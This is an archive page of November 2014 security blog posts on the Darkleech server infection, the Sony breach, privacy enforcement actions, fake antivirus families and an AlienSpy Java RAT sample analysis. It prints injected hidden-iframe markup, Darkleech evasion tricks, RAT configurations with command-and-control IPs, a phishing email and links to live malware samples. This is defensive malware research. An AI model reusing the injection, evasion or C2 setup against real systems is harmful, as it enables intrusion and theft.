Monthly Archives: November 2014

Darkleech Update – November 2014

Just wanted to document some latest changes in Darkleech behavior that may help you detect it.

I’d like to thank internet security enthusiasts who share their findings with me. Without you, I could have easily missed these new (?) details.

Quick recap

Darkleech is a root level server infection that installs malicious Apache modules. The modules inject invisible iframes into server response when it is already prepared (linebreaks added for readability).

<style>.a4on6mz5h { position:absolute; left:-1376px; top:-1819px} </style> <div class="a4on6mz5h">
<ifr ame src="hxxp://tfmjst .hopto .org/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2" width="247" height="557"></ifram e></div>

All the elements of this code are random and auto-generated on the fly (style name, coordinates, iframe diminsions, URL paths). Moreover, the iframe domains change every few minutes — lately hackers prefer free No-IP.com dynamic DNS hostnames like hopto.org, ddns.net, myftp.biz, myftp.org, serveftp.com, servepics.com, etc.

This infection is hard to detect as it only shows up once per IP per day (or maybe even more seldom). And since it works on a low system level, it can detect if server admins are logged in, so it lurks until they log out — this means that they won’t see anything even if they monitor outgoing TCP traffic.

For more details, please check the links at the bottom of this post.

What’s new?

IE=EmulateIE9

Recently, I’ve been pointed at the fact that now Darkleech also adds the following meta tag setting IE 9 compatibility mode in Internet Explorer. It looks like it searches for the </head> tag and replaces it with the following code (again, linebreaks added for readability):

<meta http-equiv='x-ua-compatible' content='IE=EmulateIE9'></head>
<style>.syxq9la69 { position:absolute; left:-1666px; top:-1634px} </style> <div class="syxq9la69">
<iframe src="hxxp://jsnrgo .ddns .net/nsiumkogckv1tv4locfzyv2eykqss9ltfb9wnmhfqz1ol2" width="285" height="554"></iframe></div>

This IE=EmulateIE9 instruction tells modern versions of Internet Explorer to render a web page as if they were IE 9, using all the features that has been deprecated in IE 10 and newer versions of IE. Some of the legacy features are known to have vulnerabilities and hackers try to exploit them turning the compatibility mode on (e.g. VML-related exploit)

_SESSION_ID cookie

In addition to temporary IP blacklisting, Darkleech also uses the _SESSION_ID cookie that expires in one week. It adds the following cookie into response headers:

Set-Cookie: _SESSION_ID=-1; expires=Wed 03-Dec-2014 09:32:48 GMT; path=/

So even if you change your IP address (e.g. if you have a dynamic IP address) you still won’t see malware for the following 7 days. So don’t forget to clear/block cookies if you are trying to reproduce infected response.

Most likely the IP blacklisting also works for one week now too.

Just a couple of more things:

  • As you might have figured out, it looks for Internet Explorer User-Agent (and derivatives like Maxthon, Avant).
  • Referer is not important at the moment. I managed to trigger it even without the Referer header.

That’s it for today. Please let me know if you have some other news about Darkleech.

Previous posts about Darkleech:

 

The Absolute Worst Case – 2 Examples of Security’s Black Swans

You know that saying "It just got real"? If you're an employee of Sony Pictures - it just got real. In a very, very bad way. There are reports that the entire Sony Pictures infrastructure is down, computer, network, VPN and all - and that there isn't an ETR on target.

There are reports that there is highly sensitive information being held for "ransom", if you can call it that, by that attackers. There is even some reporting that someone representing the attackers has contacted the tech media and disclosed that the way they were able to infiltrate so completely was through insider help. In other words, the barbarians were literally inside the castle walls.


If you work in enterprise security I don't need to explain to you how bad this is, or how thoroughly this type of compromise breaks every single contingency plan most companies (outside the government, defense space) have in place. This compromise, an "IT matter" as Sony Pictures' PR calls it, is epic levels of bad.

Definition of Black Swan event, for clarity:
"The black swan theory or theory of black swan events is a metaphor that describes an event that comes as a surprise, has a major effect, and is often inappropriately rationalized after the fact with the benefit of hindsight."
--Source: Wikipedia-- https://en.wikipedia.org/wiki/Black_swan_theory

You can read some fantastic reporting on the issue here:

Although I truly do not envy those poor souls in Enterprise Security over at Sony Pictures, it's the broader implications of this kind of attack that seriously concern me. This isn't the first time we've seen this type of attack - where the attackers had complete and total access (allegedly) into the infrastructure of the enterprise. It won't be the last time. So can we learn something here, and take it with us going forward? I think we can, if we're willing to pay attention.

I'd like to pose a few hypothetical scenarios here, given the lesson we're learning again from this unfortunate case- and what can or should be done to avoid being, to put it mildly, thoroughly screwed.

Case- Insider Threat / Rogue Insider
Insider threats are the stuff of myth in much of enterprise security. We hear a lot about how dangerous they can be but it's rare that someone actually comes forward with a first-hand account. If this incident is truly an insider threat (rogue employee, aiding an outside attacker) then it will be a case used for years to illustrate the point.

Insiders hold a special place in the nightmares of enterprise security professionals. Mostly because much of our defenses are positioned at our borders so when someone who has access and is a trusted insider goes rogue we have very little recourse. This is the continuing problem we see as defenders - the M&Ms paradigm. Hard outer shell, soft chewy middle.

A lifetime ago when I was leading up enterprise security engineering our team had discussions about how we were going to protect ourselves against this type of threat. We knew we had malicious insiders in many places with deep access and deeper pockets - so rooting them out wasn't going to work. If you can't keep them out then what's the next line of prevention? Maybe it's a little bit of 1990's technology like segmentation of network assets, separation of duties, and tight identity and access management controls. Further that, we profile people's behaviors and look to build operational baselines - I know this is much easier said than done, no need to repeat.

So what happens when prevention fails, often catastrophically and publicly? We turn to detection and response. Failure to prevent isn't failure, it's a fail in the kill chain, forcing us to move to the next step down. Detection, swiftly and silently, is the next big key. Again, if you don't know what normal looks like you will never know what abnormal deviation is, I hope that's intuitive. I've never known an attacker that gets caught by an IPS signature - mainly because there is no such thing. So again, what does detection look like? I think it comes down to detecting deviations (even if they're subtle) in behavioral patterns of humans and/or systems. I don't think you need to spend a million dollars to do it. Maybe it's enough to use Marcus Ranum's "never-seen-before" idea. Take key assets, and build access tables for who accesses, how frequently, and when. Then look for net-new access (even if it's legal/allowed) and investigate. Sure, you may technically have access to that HR share, but you really shouldn't be accessing it, and under normal conditions you wouldn't.

But what if the things you're stealing as an insider threat are the things you work with and have access to every day. Well, then we focus on exfiltration (deeper down the kill chain). How does it leave your environment? Can you prevent people from taking data out of your network, or at least catch them when they try? I'm fairly confident the answer is no if it's just a general question - but if you can identify and tag at some meta-level things that are critical, really critical, to your organization maybe you can find when it's trying to leave the infrastructure without permission? I don't know the answer here mainly because one answer isn't going to solve all of the problems out there, and it's a "well, it depends" answer based on your company profile.

I can tell you this though, insider threats are models for using kill chain analysis.

Recovering from an insider is a little more difficult, particularly when you don't know who they are. Insiders can burrow deep, and stay hidden for a long time - sometimes going completely undiscovered. This means that if you're fairly sure you've been compromised by a malicious insider, but can't identify the attacker, you're in for a rough go at trying to figure out what state to restore to. Do you restore your network/infrastructure to 2 days ago? 2 weeks ago? 2 months ago? The answer is uncertain until you find and profile the attacker. Once you do, you're likely to discover that you can't trust much of your infrastructure telemetry if the attacker was well-hidden. Covering their tracks is something "advanced" adversaries are good at.

The things to think about here are two-fold. First - you need to identify and attribute the attack to someone, or a group. Post-haste. Yesterday speeds. You need to know who they are, so you can start tracing their steps and figure out what they did, when they did it, and the extent of the potential damage. If you can't figure this out quickly, getting the infrastructure to a working state may not do you any good because it could still be compromised in that state, or could leave you open to another run at compromised further down the line when you believe you've removed the threat.

Second, you need to restore services and bring back the business. Today many companies simply cease to exist without IT. If you want to degrade or destroy a company - take away their ability to network and communicate. The battle of service restoration versus security analysis will be bitter, and  you'll probably lose as the CISO. Restore services, and figure out what's going on, maybe in parallel, maybe not - but that first step is almost universal with the notable exception of a few industry segments where being secured is as critical as being online.


Case- Compromised Core Infrastructure
Nothing says you're about to have a bad day like the source of a major attack on your enterprise coming through your endpoint management infrastructure. This starts to feel a lot like an insider threat - although it doesn't necessarily have to be. I can't even imagine the horror of finding out that your endpoint patching and software delivery platform has been re-purposed to deliver malware to all of your endpoints and that it has been the focal point of your adversary's operations. If you can't trust your core infrastructure - what can you trust?

Perhaps trust is the wrong way to look at it, as my friend Steve Ragan pointed out. So what then?

Within the enterprise framework there has to be some piece of infrastructure that is trusted. Maybe it's a system that stays physically offline (off?) until it's critically needed with alternate credentials and operational parameters. Maybe it's a recovery platform that you have a known-good hash of so that you can quickly validate you're working with the genuine article. Maybe it's something else, but you have to have something to trust.

If you have a compromised core infrastructure, I think you're looking at one of two options. Option A is restoring your systems to a questionable state (but not obviously compromised and usable) and working backwards to find the intruder. Option B is closing everything down and re-deploying everything and starting from scratch. Option B may very well sound like the more security-sound option until you factor in the actual data. Nothing says your data can't be compromised...it's not just about windows credentials. Maybe some of your company's top-secret documents are PDFs. Maybe the attacker was clever and trojaned all of your PDFs such that as soon as one is opened, the compromise starts all over again.

I seriously doubt that would be detected because it's likely custom-written code and won't pop up on all but the most sophisticated (dare I say "next ten") detection tools.

My suggestion here? Start with the inner-most critical components of your infrastructure, audit and reset credentials and work your way out in concentric rings until you start to get to components which you can actually get by without. This exercise should keep your operations teams busy for a while, and you can maybe even get a parallel incident response investigation going in the mean time. On the plus side, this gives you a tiny window within which to start to build things better from the ashes. Or maybe not since you'll be going at light speed plus 1mph. This is, however, the only advice that makes sense. It's also the only advice I can give you that I have actually tried myself - and as painful as it sounds, believe me when I say that in real life it's significantly worse.


Before this post gets to long (or have we long crossed that bridge?) I think it's safe to say that very few of you reading this post are operationally prepared to handle this type of incident where you've either got a malicious insider who has gone undetected and wreaked utter chaos, or a compromised core infrastructure by an outsider - or both if you're won the crap lottery. That's a problem because this is our black swan. This is our version of planes with hijackers flying into buildings. We know it's a possibility, but none of us have the resources to do prepare, and let's face it - we have bigger problems. Except that these incidents are real. And the Black Swan is real. It happens. Now what?

Does this adjust your world view, or risk model for your organization somehow? If so, in what way? Will you start taking the insider threat more seriously as a result? Why or why not... and how? By my unscientific calculation there are probably .05% of companies out there who have the capital and the resources to pull off recovering from one of these Black Swan events, with anything even resembling success. The rest of us in the enterprise? What do we do when the worst-case happens?

I'm curious on how you see things. Leave a comment here, or take the conversation to Twitter with the hashtag #DtSR - let's talk about it. I think we can learn something from the horrendous situation Sony Pictures is living right now - let's not waste a teachable moment for everyone, collectively, to get even a tiny bit better.

Massachusetts Attorney General Reaches Settlement with Boston Hospital Over Data Security Allegations

On November 21, 2014, Massachusetts Attorney General Martha Coakley announced that Boston hospital Beth Israel Deaconess Medical Center (“BIDMC”) has agreed to pay a total of $100,000 to settle charges related to a data breach that affected the personal and protected health information of nearly 4,000 patients and employees.

In its complaint, the Attorney General alleged that a trespasser entered an unlocked office of a BIDMC physician and stole a personal laptop containing unencrypted names, Social Security numbers and medical information of 4,000 patients and employees. The Attorney General alleged that the breach was a result of BIDMC’s failure to lawfully protect the personal and protected health information of its patients and employees in violation of the Massachusetts Consumer Protection Act, the Massachusetts Data Security Law, and the federal Health Insurance Portability and Accountability Act.

Pursuant to the consent judgment, BIDMC will pay $100,000 to resolve the allegations. $15,000 of the $100,000 settlement will be applied to a fund administered by the Attorney General for data protection educational programs. The consent judgment also requires BIDMC to “take steps to ensure future compliance with state and federal data security laws and regulations,” including the implementation of enhanced device management, encryption and training policies.

In response to the settlement, Massachusetts Attorney General Martha Coakley said that “[t]he healthcare industry’s increased reliance on technology makes it more important than ever that providers ensure patients’ personal information and protected health information is secure,” and that “[t]o prevent breaches like this from happening, hospitals must put in place and enforce reasonable technological and physical security measures.”

3 Rules for Cyber Monday


3 Rules for Cyber Monday


It’s nearly here again folks, and the clues are all there: planning the office Christmas party, your boss humming Rudolph the Red Nosed Reindeer and an armada of Amazon packages arriving.

Which brings me nicely to the topic of this blog: online shopping at work.

It’s official; we are ‘in love’ with online shopping. At this time of the year, it’s harder to resist temptation. Retailers conjure up special shopping events like Black Friday and Cyber Monday - all aimed at getting us to part with our hard earned cash. While online retailers rub their hands in anticipation of December 1st, for companies without proper web security, the online shopping season could turn out to be the nightmare before Christmas.

In a recent survey by RetailMeNot, a digital coupon provider, 86 percent of working consumers admitted that they planned to spend at least some time shopping or browsing online for gifts during working hours on Cyber Monday. That equates to a whole lot of lost productivity and unnecessary pressure on your bandwidth.

To help prevent distraction and clogged bandwidth, I know of one customer, I’m sure there are others, who is allowing his employees time to shop from their desks in their lunch breaks. He’s a smart man - productivity stays high and employees happy.

But productivity isn’t the only concern for the IT department – cyber criminals are out in force at this time of year, trying to take advantage of big hearts and open wallets with spam and phishing emails. One click on a seemingly innocent link could take your entire network down.

To keep such bad tidings at bay, here’s a web security checklist to ensure your holiday season is filled with cheer not fear.

1.  Flexible Filtering. Set time quotas to allow online shopping access at lunchtimes, or outside of core hours. Whatever you decide is reasonable, make sure your employees are kept in the loop about what you classify as acceptable usage and communicate this through an Acceptable Usage Policy.

2.  Invest in Anti-malware and Anti-spam Controls. As inboxes start to fill with special offer emails, it gets more difficult to differentiate between legitimate emails and spam. These controls will go some way towards separating the wheat from the chaff.

3.  Issue Safety Advice to Your Employees. Ask employees to check the legitimacy of a site before purchasing anything. The locked padlock symbol indicates that the purchase is encrypted and secure. In addition, brief them to be alert for phishing scams and not to open emails, or click on links from unknown contacts.

Hunton Global Privacy Update – November 2014

On November 18, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program covered a number of privacy and data protection topics, including a report on the International Conference of Data Protection and Privacy Commissioners, highlights on the Council of the European Union’s proposed revisions to the compliance obligations of data controllers and data processors included in Chapter IV of the forthcoming EU General Data Protection Regulation, and U.S. highlights on California’s breach report and Federal Communications Commission enforcement actions.

Listen to a recording of the November 2014 Hunton Global Privacy Update.

Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Privacy Update is slated for January 20, 2015.

Rango MultiRogue 2014

This Chameleon fake Antivirus is looking for the OS version (XP, Vista, Seven) and changes its name and skin: Rango Win 7 Protection 2014, Rango Win 8 Antivirus 2014, Rango Vista Protection 2014, (...). It detects fake infections and displays alert messages to scare users. It belongs to the Braviax/FakeRean family.

Centre’s Risk Workshop II in Brussels Emphasizes that Risk-Based Approach to Privacy Does Not Change Legal Obligations but Helps Calibrate Their Effective Implementation

On November 18, 2014, the Centre for Information Policy Leadership at Hunton & Williams (the “Centre”) held the second workshop in its ongoing work on the risk-based approach to privacy and a Privacy Risk Framework. Approximately 70 Centre members, privacy regulators and other privacy experts met in Brussels to discuss the benefits and challenges of the risk-based approach, operationalizing risk assessments within organizations, and employing risk analysis in enforcement. In discussing these issues, the speakers emphasized that the risk-based approach does not change the obligation to comply with privacy laws but helps with the effective calibration of privacy compliance programs.

The workshop was kicked off by Bojana Bellamy, the Centre’s President, and Fred Cate, Senior Policy Advisor for the Centre, who had prepared a discussion draft of the Centre’s second white paper on the risk-based approach to privacy, The Role of Risk in Data Protection. The paper is now being finalized with learnings from the workshop for wider distribution in the coming weeks.

Fred Cate also moderated the first panel on the benefits and challenges of the risk-based approach, during which he, Commissioner Julie Brill of the Federal Trade Commission, Peter Hustinx of the European Data Protection Supervisor, Florence Raynal of the French Data Protection Authority (the “CNIL”), JoAnn Stonier of MasterCard, and Danny Weitzner of Massachusetts Institute of Technology discussed questions such as (1) what is driving the recently intensified focus on risk assessments as a privacy compliance tool in the modern information age, and (2) what is the risk-based approach’s potential for more effectively calibrating compliance and implementing existing privacy principles and legal obligations. The panelists also discussed examples of instances where risk assessments are currently required or used under existing legal regimes, including the EU Data Protection Directive and the FTC Act, as well as the types of harms to individuals and society that can or should be considered in the context of privacy risk assessments and whether government (legislatures or regulators) should provide more guidance on risk assessments.

During lunch, Luca DeMatteis, Italian Presidency of the Council of the European Union, Justice Counselor (Cooperation in Criminal Matters and Data Protection), Permanent Representation of Italy to the EU, discussed the progress of the Council’s expert working group on the proposed EU General Data Protection Regulation (“Proposed Regulation”) and how the Council intends to incorporate the risk-based approach in the Proposed Regulation.

The second panel on operationalizing risk assessments within organizations considered different approaches businesses currently take in assessing potential privacy risks and the privacy-related impact of their products and services. The panel comprised of representatives of Acxiom, Apple, Google, Nokia and Accenture. It also included Naomi Lefkovitz, Senior Privacy Policy Advisor of the National Institute of Standards and Technology (“NIST”) at the U.S. Department of Commerce, who discussed NIST’s privacy engineering initiative and Privacy Risk Model. A key message from this panel was that the ongoing work on the risk-based approach to privacy is not about substituting risk assessments for compliance with legal requirements but about developing a methodology for complying with the law more effectively.

During the third panel, Richard Thomas, Global Strategy Advisor for the Centre and former UK Privacy Commissioner, Jacob Kohnstamm of the Dutch Data Protection Authority, Manuela Siano of the Italian Data Protection Authority (the Garante), David Smith of the UK Information Commissioner’s Office, and Wojciech Rafal Wiewiórowski of the Polish Data Protection Authority, discussed the use of risk assessments in privacy enforcement. Particular points of focus included:

  • the value of risk assessments in facilitating effective enforcement prioritization,
  • whether enforcement authorities should consider societal harms in addition to harms to individuals when making enforcement decisions, and
  • the role of enforcement authorities in providing guidance on the relevant factors to consider in organizational risk assessments.

The objectives of the Centre’s Privacy Risk Framework Project are discussed in detail in the Centre’s June 2014 white paper, A Risk-based Approach to Privacy: Improving Effectiveness in Practice. The paper notes how the Privacy Risk Framework project elaborates on the Centre’s earlier work on organizational accountability by seeking to develop analytical tools and a common framework and methodology for risk assessments that are needed to effectively implement key aspects of accountability.

The Centre has tentative plans to hold its Risk Workshop III on March 4, 2015, in the margins of the IAPP Global Privacy Summit in Washington, D.C.

Zorton Multirogue 2014

This Chameleon fake Antivirus is looking for the OS version (XP, Vista, Seven) and changes its name and skin: Zorton Win 7 Protection 2014, Zorton Win 8 Antivirus 2014, Zorton Vista Protection 2014, (...). It detects fake infections and displays alert messages to scare users. It belongs to the Braviax/FakeRean family.


Thanks to @kafeine for the sample

Court Orders Debt Brokers to Notify Consumers Following FTC Allegations of Unlawful Disclosure of Personal Information

On November 12, 2014, the Federal Trade Commission announced that in response to FTC complaints, a federal court has ordered two debt brokerage companies to notify over 70,000 consumers whose sensitive personal information was posted on a public website by the debt brokerage companies.

The two defendants are debt brokers that sell portfolios of consumer debt for eventual collection by third party debt collectors. The FTC alleged that the defendants attempted to sell their portfolios by posting them on a public online marketplace in the form of unencrypted, unprotected Excel spreadsheets. These spreadsheets allegedly contained sensitive personal information, including the indebted consumers’ bank account and credit card numbers, birth dates, contact information, employers’ names, and information about debts the consumers allegedly owed. Based on these allegations, the FTC charged these defendants in two separate complaints with violating Section 5 of the FTC Act by unfairly exposing consumers’ personal information without their knowledge or consent.

In separate decisions, the court found that there was good cause to believe that the defendants engaged in acts and practices that violated Section 5 of the FTC Act. Through the issuance of preliminary injunctions, the court required the defendants to provide notice to the consumers whose sensitive information had been posted. The court also ordered the defendants to notify the affected consumers of how they can protect themselves against identity theft and other fraud in light of the disclosures.

According to Jessica Rich, Director of the FTC’s Bureau of Consumer Protection, “[d]ebt brokers and collectors who play fast and loose with people’s sensitive personal and financial information are causing tremendous harm.” Rich warned that “[c]ompanies must treat sensitive consumer information with appropriate care and security, and the FTC will take action when they fail to do so.”

AlienSpy Java RAT samples and traffic information



AlienSpy Java based cross platform RAT is another reincarnation of ever popular Unrecom/Adwind and Frutas RATs that have been circulating through 2014.

It appears to be used in the same campaigns as was Unrccom/Adwind - see the references. If C2 responds, the java RAT downloads Jar files containing Windows Pony/Ponik loader. The RAT is crossplatform and installs and beacons from OSX and Linux as well. However, it did not download any additional malware while running on OSX and Linux.

The samples, pcaps, and traffic protocol information  are available below.




File information


I
File: DB46ADCFAE462E7C475C171FBE66DF82_paymentadvice.jar
Size: 131178
MD5:  DB46ADCFAE462E7C475C171FBE66DF82

File: 01234.exe (Pony loader dropped by FAB8DE636D6F1EC93EEECAADE8B9BC68 - Transfer.jar_
Size: 792122
MD5:  B5E7CD42B45F8670ADAF96BBCA5AE2D0

II
File: 79e9dd35aef6558461c4b93cd0c55b76_Purchase Order.jar
Size: 125985
MD5:  79E9DD35AEF6558461C4B93CD0C55B76

III
File: B2856B11FF23D35DA2C9C906C61781BA_purchaseorder.jar
Size: 49084
MD5:  b2856b11ff23d35da2c9c906c61781ba


Download


Original jar attachment files
B2856B11FF23D35DA2C9C906C61781BA_purchaseorder.jar
DB46ADCFAE462E7C475C171FBE66DF82_paymentadvice.jar
79e9dd35aef6558461c4b93cd0c55b76_Purchase Order.jar

Pcap files download
AlienSpyRAT_B2856B11FF23D35DA2C9C906C61781BA.pcap
AlienSpyRAT_79E9DD35AEF6558461C4B93CD0C55B76.pcap
Pony_B5E7CD42B45F8670ADAF96BBCA5AE2D0.pcap
AlienspyRAT_DB46ADCFAE462E7C475C171FBE66DF82-OSXLion.pcap
AlienspyRAT_DB46ADCFAE462E7C475C171FBE66DF82-WinXP.pcap

All files with created and downloaded


References

Research:
Boredliner: Cracking obfuscated java code - Adwind 3 << detailed java analysis
Fidelis: RAT in a jar:A phishing campaign using Unrecom May 21, 2014
Crowdstrike: Adwind RAT rebranding
Symantec:Adwind RAT
Symantec: Frutas RAT
Symantec: Ponik/Pony

Java Serialization References: 
https://docs.oracle.com/javase/7/docs/platform/serialization/spec/protocol.html
http://www.kdgregory.com/index.php?page=java.serialization
http://staf.cs.ui.ac.id/WebKuliah/java/MasteringJavaBeans/ch11.pdf


Additional File details


Alienspy RAT
The following RAT config strings are extracted from memory dumps. Alienspy RAT is a reincarnated Unrecom/Adwind << Frutas RAT and is available from https://alienspy.net/
As you see by the config, it is very similar to Unrecom/Adwind
File: paymentadvice.jar
Size: 131178

MD5:  DB46ADCFAE462E7C475C171FBE66DF82
    ───paymentadvice.jar
        ├───META-INF
        │       MANIFEST.MF  <<MD5:  11691d9f7d585c528ca22f7ba6f4a131 Size: 90
        │
        ├───plugins
        │       Server.class <<MD5:  3d9ffbe03567067ae0d68124b5b7b748 Size: 520 << Strings are here
        │
        └───stub
                EcryptedWrapper.class <<MD5:  f2701642ac72992c983cb85981a5aeb6 Size: 89870
                EncryptedLoader.class <<MD5:  3edfd511873b30d1373a4dc54db336ee Size: 223356
                EncryptedLoaderOld.class << MD5:  b0ef7ff41caf69d9ae076c605653c4c7 Size: 15816
                stub.dll << MD5:  64fb8dfb8d25a0273081e78e7c40ca5e Size: 43648 << Strings are here


Alienspy Rat Config strings
DB46ADCFAE462E7C475C171FBE66DF82
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>AlienSpy</comment>
<entry key="vbox">false</entry>
<entry key="password">a2e74aef2c17329f0e8e8f347c62a6a03d16b944</entry>
<entry key="p2">1079</entry>
<entry key="p1">1077</entry>
<entry key="ps_hacker">false</entry>
<entry key="install_time">2000</entry>
<entry key="taskmgr">false</entry>
<entry key="connetion_time">2000</entry>
<entry key="registryname">GKXeW0Yke7</entry>
<entry key="wireshark">false</entry>
<entry key="NAME">IHEAKA</entry>
<entry key="jarname">unXX0JIhwW</entry>
<entry key="dns">204.45.207.40</entry>
<entry key="ps_explorer">false</entry>
<entry key="msconfig">false</entry>
<entry key="pluginfoldername">m4w6OAI02f</entry>
<entry key="extensionname">xBQ</entry>
<entry key="install">true</entry>
<entry key="win_defender">false</entry>
<entry key="uac">false</entry>
<entry key="jarfoldername">9bor9J6cRd</entry>
<entry key="mutex">xooJlYrm61</entry>
<entry key="prefix">IHEAKA</entry>
<entry key="restore_system">false</entry>
<entry key="vmware">false</entry>
<entry key="desktop">true</entry>
<entry key="reconnetion_time">2000</entry>
</properties>

IP: 204.45.207.40
Decimal: 3425554216
Hostname: 212.clients.instantdedis.com
ISP: FDCservers.net
Country: United States
State/Region: Colorado
City: Denver



79E9DD35AEF6558461C4B93CD0C55B76
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>AlienSpy</comment>
<entry key="pluginfolder">fy0qFUFuLP</entry>
<entry key="reconnetion_time">3000</entry>
<entry key="ps_hacker">true</entry>
<entry key="restore_system">true</entry>
<entry key="pluginfoldername">fy0qFUFuLP</entry>
<entry key="dns">38.89.137.248</entry>
<entry key="install_time">3000</entry>
<entry key="port2">1065</entry>
<entry key="port1">1064</entry>
<entry key="taskmgr">true</entry>
<entry key="vmware">false</entry>
<entry key="jarname">LcuSMagrlF</entry>
<entry key="msconfig">true</entry>
<entry key="mutex">VblVc5kEqY</entry>
<entry key="install">true</entry>
<entry key="instalar">true</entry>
<entry key="vbox">false</entry>
<entry key="password">7110eda4d09e062aa5e4a390b0a572ac0d2c0220</entry>
<entry key="NAME">xmas things</entry>
<entry key="extensionname">7h8</entry>
<entry key="prefix">xmas</entry>
<entry key="jarfoldername">jcwDpUEpCh</entry>
<entry key="uac">true</entry>
<entry key="win_defender">true</entry>
<entry key="

IP: 38.89.137.248
Decimal: 643402232
Hostname: 38.89.137.248
ISP: Cogent Communications
Country: United States us flag


Created Files

I
 DB46ADCFAE462E7C475C171FBE66DF82  paymentadvice.jar

%USERPROFILE%\Application Data\evt88IWdHO\CnREgyvLBS.txt <<MD5:  abe6ef71e44d2e145033800d0dccea57 << strings are here (by classes)
%USERPROFILE%\Application Data\evt88IWdHO\Desktop.ini
%USERPROFILE%\Local Settings\Temp\asdqw15727804162199772615555.jar << Strings are here
%USERPROFILE%\Local Settings\Temp\iWimMQLgpsT2624529381479181764.png (seen Transfer.jar in the stream) <<MD5:  fab8de636d6f1ec93eeecaade8b9bc68 Size: 755017 << Strings are here
%USERPROFILE%\29OVHAabdr.tmp << timestamp file << Strings are here

\deleted_files\%USERPROFILE%\\29OVHAabdr.tmp << timestamp file << Strings are here
\deleted_files\%USERPROFILE%\\Application Data\9bor9J6cRd\Desktop.ini << Strings are here
\deleted_files\%USERPROFILE%\\Application Data\9bor9J6cRd\unXX0JIhwW.txt <MD5:  DB46ADCFAE462E7C475C171FBE66DF82 < original jar << Strings are here
\deleted_files\%USERPROFILE%\\Local Settings\Temp\14583359.bat << Strings are here
\deleted_files\%USERPROFILE%\\Local Settings\Temp\asdqw4727319084772952101234.exe << Pony Downloader MD5:  b5e7cd42b45f8670adaf96bbca5ae2d0 Size: 792122 < Strings are here
\deleted_files\%USERPROFILE%\\Local Settings\Temp\OiuFr7LcfXq1847924646026958055.vbs <<MD5:  9E1EDE0DEDADB7AF34C0222ADA2D58C9 Strings are here
\deleted_files\%USERPROFILE%\\xooJlYrm61.tmp < timestamp file << Strings are here
\deleted_files\C\WINDOWS\tem.txt - 0bytes

IWIMMQLGPST2624529381479181764.PNG MD5: fab8de636d6f1ec93eeecaade8b9bc68

├───com
│   └───java
│       │   Main.class << MD5:  d020b9fdac0139d43997f9ec14fa5947 Size: 7232
│       │   Manifest.mf << MD5:  a396d2898e8a83aa5233c4258de006e3 Size: 750412
│               │   01234.exe << MD5:  b5e7cd42b45f8670adaf96bbca5ae2d0 Size: 792122
│               │   15555.jar << MD5:  abe6ef71e44d2e145033800d0dccea57 Size: 50922
│              
│               └───15555
│                   │   ID
│                   │   Main.class << MD5:  d020b9fdac0139d43997f9ec14fa5947 Size: 7232
│                   │   MANIFEST.MF << MD5:  a396d2898e8a83aa5233c4258de006e3 Size: 750412
│                   │
│                   ├───META-INF
│                   └───plugins
└───META-INF
        MANIFEST.MF << MD5:  042c2fa9077d96478ce585d210641d9a Size: 171


File types
  1. 14583359.bat (.txt) "Text file"
  2. 29OVHAabdr.tmp (.txt) "Text file"
  3. asdqw15727804162199772615555.jar (.zip) "PKZIP Compressed"
  4. asdqw4727319084772952101234.exe (.exe) "Executable File" 
  5. CnREgyvLBS.txt (.zip) "PKZIP Compressed"
  6. Desktop.ini (.txt) "Text file"
  7. DFR5.tmp (.txt) "Text file"
  8. iWimMQLgpsT2624529381479181764.png (.zip) "Zip Compressed"
  9. iWimMQLgpsT2624529381479181764.png (.zip) "PKZIP Compressed"
  10. OiuFr7LcfXq1847924646026958055.vbs (.txt) "Vbs script file"
  11. tem.txt (.txt) "Text file"
  12. unXX0JIhwW.txt (.zip) "PKZIP Compressed"
  13. xooJlYrm61.tmp (.txt) "Text file"
II

79e9dd35aef6558461c4b93cd0c55b76 Purchase Order.jar
Received: from magix-webmail (webmail.app.magix-online.com [193.254.184.250])
by smtp.app.magix-online.com (Postfix) with ESMTPSA id B626052E77F;
Sun, 16 Nov 2014 14:54:06 +0100 (CET)
Received: from 206.217.192.188 ([206.217.192.188]) by
 webmail.magix-online.com (Horde Framework) with HTTP; Sun, 16 Nov 2014
 14:54:06 +0100
Date: Sun, 16 Nov 2014 14:54:06 +0100
Message-ID: <20141116145406.Horde.YL7L4Bi7ap6_NXm76DDEaw2@webmail.magix-online.com>
From: Outokumpu Import Co Ltd <purchase@brentyil.org>
Subject: Re: Confirm correct details
Reply-to: jingwings@outlook.com
User-Agent: Internet Messaging Program (IMP) H5 (6.1.4)
Content-Type: multipart/mixed; boundary="=_FMdois7zoq7xTAV91epZoQ6"
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
This message is in MIME format.
--=_FMdois7zoq7xTAV91epZoQ6
Content-Type: text/plain; charset=UTF-8; format=flowed; DelSp=Yes
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Dear Sir,
Please confirm the attached purchase order for your reference.
Please acknowledge Invoice for the final confirmation and confirm  
details are correct so we can proceed accordingly.
Please give me feedback through this email.
IBRAHIM MOHAMMAD AL FAR
Area Manager 
Central Region
Outokumpu Import Co Ltd
Tel:   +966-11-265-2030
Fax:  +966-11-265-0350
Mob: +966-50 610 8743
P.O Box: 172 Riyadh 11383
Kingdom of Saudi Arabia
--=_FMdois7zoq7xTAV91epZoQ6
Content-Type: application/java-archive; name="Purchase Order.jar"
Content-Description: Purchase Order.jar
Content-Disposition: attachment; size=125985; filename="Purchase Order.jar"
Content-Transfer-Encoding: base64

File paths
%USERPROFILE%\Application Data\jcwDpUEpCh\Desktop.ini
%USERPROFILE%\Application Data\jcwDpUEpCh\LcuSMagrlF.txt
%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014111620141117\index.dat
%USERPROFILE%\Local Settings\Temp\hsperfdata_Laura\3884
%USERPROFILE%\VblVc5kEqY.tmp
deleted_files\%USERPROFILE%\Local Settings\Temp\TaskNetworkGathor267205042636993976.reg
deleted_files\%USERPROFILE%\VblVc5kEqY.tmp
deleted_files\C\WINDOWS\tem.txt

File types
Desktop.ini (.txt) "Text file"
index.dat (.txt) "Text file"
LcuSMagrlF.txt (.zip) "PKZIP Compressed"
